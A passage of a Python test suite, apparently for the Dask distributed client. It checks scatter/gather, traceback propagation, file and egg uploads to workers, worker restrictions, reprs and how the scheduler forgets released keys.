    assert result == 1
@gen_cluster(client=True)
async def test_scatter_tokenize_local(c, s, a, b):
    """Scatter tokenizes the object locally using registered normalizers."""
    from dask.base import normalize_token
    class MyObj:
        pass
    L = []
    @normalize_token.register(MyObj)
    def f(x):
        # record that normalization ran on the client side
        L.append(x)
        return "x"
    obj = MyObj()
    future = await c.scatter(obj)
    assert L and L[0] is obj
@gen_cluster(client=True)
async def test_scatter_singletons(c, s, a, b):
    """Ints, numpy arrays, and DataFrames round-trip through scatter."""
    np = pytest.importorskip("numpy")
    pd = pytest.importorskip("pandas")
    for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
        future = await c.scatter(x)
        result = await future
        # string compare sidesteps numpy/pandas element-wise equality
        assert str(result) == str(x)
@gen_cluster(client=True)
async def test_scatter_typename(c, s, a, b):
    """Scattered keys are prefixed with the value's type name."""
    future = await c.scatter(123)
    assert future.key.startswith("int")
@gen_cluster(client=True)
async def test_scatter_hash(c, s, a, b):
    """Equal values share a key by default; hash=False forces unique keys."""
    x = await c.scatter(123)
    y = await c.scatter(123)
    assert x.key == y.key
    z = await c.scatter(123, hash=False)
    assert z.key != y.key
@gen_cluster(client=True)
async def test_scatter_hash_2(c, s, a, b):
    """Scattering the same value twice (as lists) dedupes to one key."""
    # note: shadows the worker fixtures a and b, which are unused afterwards
    [a] = await c.scatter([1])
    [b] = await c.scatter([1])
    assert a.key == b.key
    s.validate_state()
@gen_cluster(client=True)
async def test_get_releases_data(c, s, a, b):
    """Keys computed via get are released once the results are gathered."""
    await c.gather(c.get({"x": (inc, 1)}, ["x"], sync=False))
    import gc
    gc.collect()
    while c.refcount["x"]:
        await asyncio.sleep(0.01)
def test_current(s, a, b):
    """Client.current tracks the active client and raises when none exists."""
    with Client(s["address"]) as c:
        assert Client.current() is c
    with pytest.raises(ValueError):
        Client.current()
    with Client(s["address"]) as c:
        assert Client.current() is c
def test_global_clients(loop):
    """Nested clients stack as the global default; closing restores the outer."""
    assert _get_global_client() is None
    with pytest.raises(ValueError):
        default_client()
    with cluster() as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            assert _get_global_client() is c
            assert default_client() is c
            with Client(s["address"], loop=loop) as f:
                # the innermost client wins
                assert _get_global_client() is f
                assert default_client() is f
                # an explicit argument overrides the global
                assert default_client(c) is c
                assert default_client(f) is f
    assert _get_global_client() is None
@gen_cluster(client=True)
async def test_exception_on_exception(c, s, a, b):
    """Errors propagate through chains of dependent futures."""
    x = c.submit(lambda: 1 / 0)
    y = c.submit(inc, x)
    with pytest.raises(ZeroDivisionError):
        await y
    z = c.submit(inc, y)
    with pytest.raises(ZeroDivisionError):
        await z
@gen_cluster(client=True)
async def test_get_nbytes(c, s, a, b):
    """The scheduler tracks per-key nbytes for scattered and computed data."""
    [x] = await c.scatter([1])
    assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
    y = c.submit(inc, x)
    await y
    assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_nbytes_determines_worker(c, s, a, b):
    """The scheduler schedules a task next to its larger input."""
    x = c.submit(identity, 1, workers=[a.ip])
    y = c.submit(identity, tuple(range(100)), workers=[b.ip])
    await c.gather([x, y])
    z = c.submit(lambda x, y: None, x, y)
    await z
    # z should run on b, where the big tuple lives
    assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
async def test_if_intermediates_clear_on_error(c, s, a, b):
    """After a failed compute, no intermediate data is left on workers."""
    x = delayed(div, pure=True)(1, 0)
    y = delayed(div, pure=True)(1, 2)
    z = delayed(add, pure=True)(x, y)
    f = c.compute(z)
    with pytest.raises(ZeroDivisionError):
        await f
    s.validate_state()
    assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(
    client=True, config={"distributed.scheduler.default-task-durations": {"f": "1ms"}}
)
async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
    """The scheduler moves the small shared input (total) to the workers that
    hold the large inputs (lists), not the other way around."""
    np = pytest.importorskip("numpy")
    lists = c.map(np.ones, [10000] * 10, pure=False)
    sums = c.map(np.sum, lists)
    total = c.submit(sum, sums)
    def f(x, y):
        return None
    results = c.map(f, lists, [total] * 10)
    await wait([total])
    await wait(results)
    # allow one straggler: at least 9 of 10 should co-locate with their list
    assert (
        sum(
            s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
            for l, r in zip(lists, results)
        )
        >= 9
    )
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
    """get accepts tuple and integer keys, not only strings."""
    dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
    x = await c.get(dsk, ("x", 0), sync=False)
    y = await c.get(dsk, 5, sync=False)
    assert x == 2
    assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
    """A failing upstream task makes async get raise the original error."""
    dsk = {"x": (div, 1, 0), "y": (inc, "x")}
    with pytest.raises(ZeroDivisionError):
        await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
    """Synchronous get re-raises errors from upstream tasks."""
    dsk = {"x": (div, 1, 0), "y": (inc, "x")}
    with pytest.raises(ZeroDivisionError):
        c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
    """Scatter with workers= targets specific workers, by address or by name."""
    await c.scatter([1, 2, 3], workers=[a.address])
    assert len(a.data) == 3
    assert not b.data
    # workers may also be addressed by name
    await c.scatter([4, 5], workers=[b.name])
    assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
    """Synchronous directed scatter puts all data on the requested worker."""
    futures = c.scatter([1, 2, 3], workers=[b["address"]])
    has_what = sync(loop, c.scheduler.has_what)
    assert len(has_what[b["address"]]) == len(futures)
    assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
    """direct=True scatters/gathers worker-to-client, bypassing the scheduler."""
    future = await c.scatter(123, direct=True)
    assert future.key in a.data or future.key in b.data
    assert s.tasks[future.key].who_has
    assert future.status == "finished"
    result = await future
    assert result == 123
    # the scheduler itself handled no scatter traffic
    assert not s.counters["op"].components[0]["scatter"]
    result = await future
    assert not s.counters["op"].components[0]["gather"]
    result = await c.gather(future)
    assert not s.counters["op"].components[0]["gather"]
@gen_cluster()
async def test_scatter_direct_2(s, a, b):
    """A client with a fast heartbeat keeps updating last_seen on the scheduler."""
    c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
    last = s.clients[c.id].last_seen
    while s.clients[c.id].last_seen == last:
        await asyncio.sleep(0.10)
    await c.close()
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
    """Numpy arrays round-trip through direct scatter without scheduler traffic."""
    np = pytest.importorskip("numpy")
    x = np.ones(5)
    future = await c.scatter(x, direct=True)
    result = await future
    assert np.allclose(x, result)
    assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
    """broadcast=True replicates directly-scattered data to every worker."""
    future2 = await c.scatter(456, direct=True, broadcast=True)
    assert future2.key in a.data
    assert future2.key in b.data
    assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
    result = await future2
    assert result == 456
    assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
    """Direct scatter of three items spreads across three of four workers."""
    futures = await c.scatter([1, 2, 3], direct=True)
    assert sorted(len(w.data) for w in workers) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
    """Direct scatter with an explicit target worker; broadcast=True replicates
    to every listed target worker."""
    futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
    assert futures[0].key in workers[0].data
    assert futures[1].key in workers[0].data
    futures = await c.scatter(
        [123, 456],
        direct=True,
        broadcast=True,
        workers=[w.address for w in workers[:3]],
    )
    # BUG FIX: the original asserted a bare generator expression, which is
    # always truthy and therefore checked nothing.  Wrap it in all() and
    # compare who_has against WorkerState entries (who_has holds
    # s.workers[...] objects, not address strings — see test_scatter_direct_broadcast).
    assert all(
        f.key in w.data and s.workers[w.address] in s.tasks[f.key].who_has
        for f in futures
        for w in workers[:3]
    )
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
    """Direct scatter with no workers available fails promptly."""
    with pytest.raises((ValueError, TimeoutError)):
        await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
    """Sequential direct scatters spread data across all workers."""
    futures = []
    for i in range(10):
        future = await c.scatter(i, direct=True)
        futures.append(future)
    assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
    """Sync scatter/gather round-trips for all direct/broadcast combinations."""
    futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
    results = c.gather(futures, direct=direct)
    assert results == [1, 2, 3]
    delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
    """gather(direct=True) fetches results straight from workers."""
    futures = await c.scatter([1, 2, 3])
    data = await c.gather(futures, direct=True)
    assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
    """Independent submissions land on both workers, not just one."""
    L = [c.submit(inc, i) for i in range(10)]
    await wait(L)
    assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
    """Future.traceback returns a traceback referencing the failing source line."""
    x = c.submit(div, 1, 0)
    tb = await x.traceback()
    assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
    """Errors raised through get carry the remote traceback."""
    try:
        await c.get({"x": (div, 1, 0)}, "x", sync=False)
    except ZeroDivisionError:
        exc_type, exc_value, exc_traceback = sys.exc_info()
        L = traceback.format_tb(exc_traceback)
        assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
    """Errors raised through gather carry the remote traceback."""
    x = c.submit(div, 1, 0)
    try:
        await c.gather(x)
    except ZeroDivisionError:
        exc_type, exc_value, exc_traceback = sys.exc_info()
        L = traceback.format_tb(exc_traceback)
        assert any("x / y" in line for line in L)
def test_traceback_sync(c):
    """Sync traceback(): chained futures extend the traceback; successful
    futures have none."""
    x = c.submit(div, 1, 0)
    tb = x.traceback()
    assert any(
        "x / y" in line
        for line in concat(traceback.extract_tb(tb))
        if isinstance(line, str)
    )
    y = c.submit(inc, x)
    tb2 = y.traceback()
    # y's traceback includes all of x's frames
    assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
        set(pluck(3, traceback.extract_tb(tb)))
    )
    z = c.submit(div, 1, 2)
    tb = z.traceback()
    assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
    """upload_file ships a module to workers; re-uploading refreshes it."""
    def g():
        import myfile
        return myfile.f()
    with save_sys_modules():
        for value in [123, 456]:
            with tmp_text("myfile.py", f"def f():\n    return {value}") as fn:
                await c.upload_file(fn)
                x = c.submit(g, pure=False)
                result = await x
                assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
    """A re-uploaded module is picked up by delayed computations too."""
    with save_sys_modules():
        for value in [123, 456]:
            with tmp_text("myfile.py", f"def f():\n    return {value}") as fn:
                await c.upload_file(fn)
                sys.path.append(os.path.dirname(fn))
                from myfile import f
                b = delayed(f)()  # note: shadows the worker fixture b
                bb = c.compute(b, sync=False)
                result = await c.gather(bb)
                assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
    """upload_file accepts files without an extension."""
    with tmp_text("myfile", "") as fn:
        await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
    """Modules inside an uploaded zip archive are importable on workers."""
    def g():
        import myfile
        return myfile.f()
    with save_sys_modules():
        try:
            for value in [123, 456]:
                with tmp_text(
                    "myfile.py", f"def f():\n    return {value}"
                ) as fn_my_file:
                    with zipfile.ZipFile("myfile.zip", "w") as z:
                        z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
                    await c.upload_file("myfile.zip")
                    x = c.submit(g, pure=False)
                    result = await x
                    assert result == value
        finally:
            # clean up the archive written into the working directory
            if os.path.exists("myfile.zip"):
                os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
    """Packages inside an uploaded .egg become importable on workers."""
    def g():
        import package_1
        import package_2
        return package_1.a, package_2.b
    # c.upload_file tells each worker to
    # - put this file in their local_directory
    # - modify their sys.path to include it
    # we don't care about the local_directory
    # but we do care about restoring the path
    with save_sys_modules():
        for value in [123, 456]:
            with tmpfile() as dirname:
                os.mkdir(dirname)
                with open(os.path.join(dirname, "setup.py"), "w") as f:
                    f.write("from setuptools import setup, find_packages\n")
                    f.write(
                        'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
                            value
                        )
                    )
                # test a package with an underscore in the name
                package_1 = os.path.join(dirname, "package_1")
                os.mkdir(package_1)
                with open(os.path.join(package_1, "__init__.py"), "w") as f:
                    f.write(f"a = {value}\n")
                # test multiple top-level packages
                package_2 = os.path.join(dirname, "package_2")
                os.mkdir(package_2)
                with open(os.path.join(package_2, "__init__.py"), "w") as f:
                    f.write(f"b = {value}\n")
                # compile these into an egg
                subprocess.check_call(
                    [sys.executable, "setup.py", "bdist_egg"], cwd=dirname
                )
                egg_root = os.path.join(dirname, "dist")
                # first file ending with '.egg'
                egg_name = [
                    fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
                ][0]
                egg_path = os.path.join(egg_root, egg_name)
                await c.upload_file(egg_path)
                os.remove(egg_path)
                x = c.submit(g, pure=False)
                result = await x
                assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
    """_upload_large_file writes files into every worker's local directory,
    honoring an optional remote filename."""
    assert a.local_directory
    assert b.local_directory
    with tmp_text("myfile", "abc") as fn:
        with tmp_text("myfile2", "def") as fn2:
            await c._upload_large_file(fn, remote_filename="x")
            await c._upload_large_file(fn2)
            for w in [a, b]:
                assert os.path.exists(os.path.join(w.local_directory, "x"))
                assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
                with open(os.path.join(w.local_directory, "x")) as f:
                    assert f.read() == "abc"
                with open(os.path.join(w.local_directory, "myfile2")) as f:
                    assert f.read() == "def"
def test_upload_file_sync(c):
    """Synchronous upload_file makes the module importable in tasks."""
    def g():
        import myfile
        return myfile.x
    with tmp_text("myfile.py", "x = 123") as fn:
        c.upload_file(fn)
        x = c.submit(g)
        assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
    """Uploading a file with a syntax error raises on the client."""
    with tmp_text("myfile.py", "syntax-error!") as fn:
        with pytest.raises(SyntaxError):
            await c.upload_file(fn)
def test_upload_file_exception_sync(c):
    """Synchronous variant: a broken module raises SyntaxError on upload."""
    with tmp_text("myfile.py", "syntax-error!") as fn:
        with pytest.raises(SyntaxError):
            c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
    """A worker that joins after upload_file still receives the file."""
    def g():
        import myfile
        return myfile.x
    with tmp_text("myfile.py", "x = 123") as fn:
        await c.upload_file(fn)
        async with Worker(s.address):
            x = await c.submit(g)
    assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
    """(Disabled) Futures from different clients interoperate in submissions."""
    # note: shadows the worker fixtures a and b with clients
    a = await Client(s.address, asynchronous=True)
    b = await Client(s.address, asynchronous=True)
    x = a.submit(inc, 1)
    y = b.submit(inc, 2)
    assert x.client is a
    assert y.client is b
    xx = await x
    yy = await y
    assert xx == 2
    assert yy == 3
    # mixing futures across clients in a submission
    z = a.submit(add, x, y)
    assert z.client is a
    zz = await z
    assert zz == 5
    await a.close()
    await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
    """compute(sync=False) returns futures; plain values pass through unchanged."""
    from dask.delayed import delayed
    x = delayed(1)
    y = delayed(inc)(x)
    z = delayed(dec)(x)
    [yy, zz, aa] = c.compute([y, z, 3], sync=False)
    assert isinstance(yy, Future)
    assert isinstance(zz, Future)
    assert aa == 3  # non-delayed inputs are returned as-is
    result = await c.gather([yy, zz])
    assert result == [2, 0]
    assert isinstance(c.compute(y), Future)
    assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
    """Scattered futures can feed directly into a delayed computation."""
    d = await c.scatter({("x", 1): 1, ("y", 1): 2})
    x, y = d[("x", 1)], d[("y", 1)]
    from dask.delayed import delayed
    z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
    zz = c.compute(z)
    [result] = await c.gather([zz])
    assert result == 2 + 3
def test_sync_compute(c):
    """compute(sync=True) returns concrete results directly."""
    x = delayed(1)
    y = delayed(inc)(x)
    z = delayed(dec)(x)
    yy, zz = c.compute([y, z], sync=True)
    assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
    """Scattered values land on some worker and gather back intact."""
    x, y, z = await c.scatter([1, 2, 3])
    assert x.key in a.data or x.key in b.data
    assert y.key in a.data or y.key in b.data
    assert z.key in a.data or z.key in b.data
    xx, yy, zz = await c.gather([x, y, z])
    assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(client=True)
async def test_remote_submit_on_Future(c, s, a, b):
    """A Future passed into submit is resolved to its value on the worker."""
    x = c.submit(lambda x: x + 1, 1)
    y = c.submit(lambda x: x + 1, x)
    result = await y
    assert result == 3
def test_start_is_idempotent(c):
    """Calling Client.start() repeatedly is harmless; the client still works."""
    for _ in range(3):
        c.start()
    future = c.submit(inc, 1)
    assert future.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
    """Smoke test: submit, scatter, gather, and get all work on one cluster."""
    assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    z = c.submit(add, x, y)
    result = await x
    assert result == 1 + 1
    result = await z
    assert result == 1 + 1 + 1 + 2
    A, B, C = await c.scatter([1, 2, 3])
    AA, BB, xx = await c.gather([A, B, x])
    assert (AA, BB, xx) == (1, 2, 2)
    result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
    assert result == 12
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
    """allow_other_workers=True records loose restrictions and lets tasks run
    elsewhere when the requested worker does not exist; invalid combinations
    of workers=/allow_other_workers raise."""
    aws = s.workers[a.address]
    bws = s.workers[b.address]  # BUG FIX: was s.workers[a.address] (copy-paste typo)
    # strict restriction, satisfied
    x = c.submit(inc, 1, workers=a.ip)
    await x
    assert s.tasks[x.key].who_has == {aws}
    assert not s.loose_restrictions
    # restriction satisfied, but the loose flag is still recorded
    x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
    await x
    assert s.tasks[x.key].who_has == {aws}
    assert x.key in s.loose_restrictions
    L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
    await wait(L)
    assert all(s.tasks[f.key].who_has == {aws} for f in L)
    assert {f.key for f in L}.issubset(s.loose_restrictions)
    # nonexistent worker: loose restriction lets the tasks run anywhere
    x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
    await x
    assert s.tasks[x.key].who_has
    assert x.key in s.loose_restrictions
    L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
    await wait(L)
    assert all(s.tasks[f.key].who_has for f in L)
    assert {f.key for f in L}.issubset(s.loose_restrictions)
    # allow_other_workers without workers= is meaningless
    with pytest.raises(ValueError):
        c.submit(inc, 1, allow_other_workers=True)
    with pytest.raises(ValueError):
        c.map(inc, [1], allow_other_workers=True)
    # allow_other_workers must be a bool
    with pytest.raises(TypeError):
        c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
    with pytest.raises(TypeError):
        c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
def test_bad_address():
    """Connecting to an unreachable scheduler address fails fast with OSError."""
    for address in ("123.123.123.123:1234", "127.0.0.1:1234"):
        with pytest.raises(OSError, match="connect"):
            Client(address, timeout=0.1)
def test_informative_error_on_cluster_type():
    """Passing a class (not an address or cluster instance) to Client raises
    a TypeError with a helpful message."""
    with pytest.raises(
        TypeError, match="Scheduler address must be a string or a Cluster instance"
    ):
        Client(LocalCluster)
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
    """Very long error messages and tracebacks are truncated in transit."""
    def bad(x):
        raise ValueError("a" * 100000)
    x = c.submit(bad, 10)
    try:
        await x
    except ValueError as e:
        assert len(str(e)) < 100000
    tb = await x.traceback()
    assert all(
        len(line) < 100000
        for line in concat(traceback.extract_tb(tb))
        if isinstance(line, str)
    )
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
    """map/submit over futures combine future inputs with plain kwargs."""
    def f(x, y=10):
        return x + y
    futures = c.map(inc, range(10))
    futures2 = c.map(f, futures, y=20)
    results = await c.gather(futures2)
    assert results == [i + 1 + 20 for i in range(10)]
    future = c.submit(inc, 100)
    future2 = c.submit(f, future, y=200)
    result = await future2
    assert result == 100 + 1 + 200
class BadlySerializedObject:
    """Test helper: pickles fine but raises TypeError('hello!') on unpickle."""
    def __getstate__(self):
        return 1
    def __setstate__(self, state):
        raise TypeError("hello!")
class FatallySerializedObject:
    """Test helper: kills the deserializing process outright on unpickle,
    simulating a worker that dies while receiving data."""
    def __getstate__(self):
        return 1
    def __setstate__(self, state):
        print("This should never have been deserialized, closing")
        import sys
        sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
    """A future whose input fails to deserialize errors without disrupting
    other work on the cluster."""
    o = BadlySerializedObject()
    future = c.submit(inc, o)
    futures = c.map(inc, range(10))
    L = await c.gather(futures)
    assert list(L) == list(map(inc, range(10)))
    assert future.status == "error"
    with pytest.raises(Exception) as info:
        await future
    assert "hello!" in str(info.value)
@pytest.mark.skip
@gen_test()
async def test_badly_serialized_input_stderr(capsys, c):
    """(Disabled) The deserialization error should appear on stderr.
    NOTE(review): gen_test does not normally provide a `c` fixture — verify
    the signature if this test is ever re-enabled."""
    o = BadlySerializedObject()
    future = c.submit(inc, o)
    while True:
        sleep(0.01)
        out, err = capsys.readouterr()
        if "hello!" in err:
            break
    assert future.status == "error"
def test_repr(loop):
    """str/repr/HTML reprs show address, thread count, and memory; after
    close they say no scheduler is connected."""
    funcs = [str, repr, lambda x: x._repr_html_()]
    with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GiB"}) as (s, [a, b, c]):
        with Client(s["address"], loop=loop) as c:
            for func in funcs:
                text = func(c)
                assert c.scheduler.address in text
                assert "threads=3" in text or "Total threads: </strong>" in text
                assert "6.00 GiB" in text  # 3 workers x 2 GiB
                if "<table" not in text:
                    assert len(text) < 80
        # client is closed here
        for func in funcs:
            text = func(c)
            assert "No scheduler connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
    """The HTML repr renders without error for an async client."""
    c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
    """The HTML repr renders when workers have no memory limit configured."""
    c._repr_html_()
@gen_test()
async def test_repr_localcluster():
    """The HTML repr of a LocalCluster client is valid XML and shows the address."""
    cluster = await LocalCluster(
        processes=False, dashboard_address=":0", asynchronous=True
    )
    client = await Client(cluster, asynchronous=True)
    try:
        text = client._repr_html_()
        assert cluster.scheduler.address in text
        assert is_valid_xml(client._repr_html_())
    finally:
        await client.close()
        await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
    """Releasing keys removes tasks from the scheduler, but only once no
    dependent task still needs them."""
    x = c.submit(inc, 1, retries=2)
    y = c.submit(inc, 2)
    z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
    await wait([x, y, z])
    assert not s.waiting_data.get(x.key)
    assert not s.waiting_data.get(y.key)
    assert set(s.tasks) == {x.key, y.key, z.key}

    s.client_releases_keys(keys=[x.key], client=c.id)
    # x is still a dependency of z, so it must survive its own release
    assert x.key in s.tasks
    s.client_releases_keys(keys=[z.key], client=c.id)
    # with z gone, x has no dependents left and is dropped too
    assert x.key not in s.tasks
    assert z.key not in s.tasks
    assert not s.tasks[y.key].dependents
    s.client_releases_keys(keys=[y.key], client=c.id)
    assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
    """Releasing keys in a diamond-shaped task graph only forgets tasks whose
    dependents have all been released as well."""
    a, b, c, d = await e.scatter(list(range(4)))
    ab = e.submit(add, a, b)
    cd = e.submit(add, c, d)
    ac = e.submit(add, a, c)
    acab = e.submit(add, ac, ab)

    await wait([a, b, c, d, ab, ac, cd, acab])

    assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}

    s.client_releases_keys(keys=[ab.key], client=e.id)
    # ab is still needed by acab, so nothing is forgotten yet
    assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}

    s.client_releases_keys(keys=[b.key], client=e.id)
    # b's only dependent (ab) was released, so b and ab go together
    assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}

    s.client_releases_keys(keys=[acab.key], client=e.id)
    assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
    assert b.key not in s.tasks

    # wait for the workers to actually evict b's data
    while b.key in A.data or b.key in B.data:
        await asyncio.sleep(0.01)

    s.client_releases_keys(keys=[ac.key], client=e.id)
    assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
    """Releasing a key while its graph is still executing forgets the whole
    unneeded subgraph and keeps scheduler state valid."""
    delayed2 = partial(delayed, pure=True)
    a, b, c, d = (delayed2(slowinc)(i) for i in range(4))
    ab = delayed2(slowadd)(a, b, dask_key_name="ab")
    cd = delayed2(slowadd)(c, d, dask_key_name="cd")
    ac = delayed2(slowadd)(a, c, dask_key_name="ac")
    acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")

    x, y = e.compute([ac, acab])
    s.validate_state()

    # let some (but not necessarily all) tasks start
    for i in range(5):
        await asyncio.sleep(0.01)
        s.validate_state()

    s.client_releases_keys(keys=[y.key], client=e.id)
    s.validate_state()

    # acab and its exclusive dependencies (ab, b) are forgotten mid-flight
    for k in [acab.key, ab.key, b.key]:
        assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
    """Exception/blame records survive until every task that shares the
    failure has been released."""
    x = c.submit(div, 1, 0)
    y = c.submit(inc, x)
    z = c.submit(inc, y)
    await wait([y])

    # x failed; y and z are blamed on x's exception
    assert x.key in s.exceptions
    assert x.key in s.exceptions_blame
    assert y.key in s.exceptions_blame
    assert z.key in s.exceptions_blame

    s.client_releases_keys(keys=[z.key], client=c.id)

    assert x.key in s.exceptions
    assert x.key in s.exceptions_blame
    assert y.key in s.exceptions_blame
    assert z.key not in s.exceptions_blame

    s.client_releases_keys(keys=[x.key], client=c.id)

    # y still depends on x, so x's exception record is kept alive
    assert x.key in s.exceptions
    assert x.key in s.exceptions_blame
    assert y.key in s.exceptions_blame
    assert z.key not in s.exceptions_blame

    s.client_releases_keys(keys=[y.key], client=c.id)

    # nothing references the failure any more — all records are gone
    assert x.key not in s.exceptions
    assert x.key not in s.exceptions_blame
    assert y.key not in s.exceptions_blame
    assert z.key not in s.exceptions_blame
def test_repr_sync(c):
    """str/repr of a synchronous client show address and worker/thread info."""
    s = str(c)
    r = repr(c)
    assert c.scheduler.address in s
    assert c.scheduler.address in r
    assert str(2) in s  # nworkers
    assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
    """Once tasks complete they no longer appear in the scheduler's
    waiting_data bookkeeping."""
    x = c.submit(inc, 1)
    y = c.submit(inc, 2)
    z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)

    await wait([x, y, z])

    assert not s.waiting_data.get(x.key)
    assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
    """Two clients sharing a key: the scheduler tracks per-client wants and
    releases data only when no client wants it any more."""
    c = await Client(s.address, asynchronous=True)
    f = await Client(s.address, asynchronous=True)

    assert set(s.client_comms) == {c.id, f.id}

    x = c.submit(inc, 1)
    y = f.submit(inc, 2)
    y2 = c.submit(inc, 2)

    # same pure call from both clients maps to the same key
    assert y.key == y2.key

    await wait([x, y])

    assert s.wants_what == {
        c.id: {x.key, y.key},
        f.id: {y.key},
        "fire-and-forget": set(),
    }
    assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}

    await c.close()

    while c.id in s.wants_what:
        await asyncio.sleep(0.01)

    assert c.id not in s.wants_what
    assert c.id not in s.who_wants[y.key]
    assert x.key not in s.who_wants

    await f.close()

    # with no clients left, all tasks are eventually released
    while s.tasks:
        await asyncio.sleep(0.01)
def long_running_client_connection(address):
    """Helper run in a subprocess: hold a client connection open (with one
    completed task) until the process is terminated by the parent test."""
    with pristine_loop():
        c = Client(address)
        x = c.submit(lambda x: x + 1, 10)
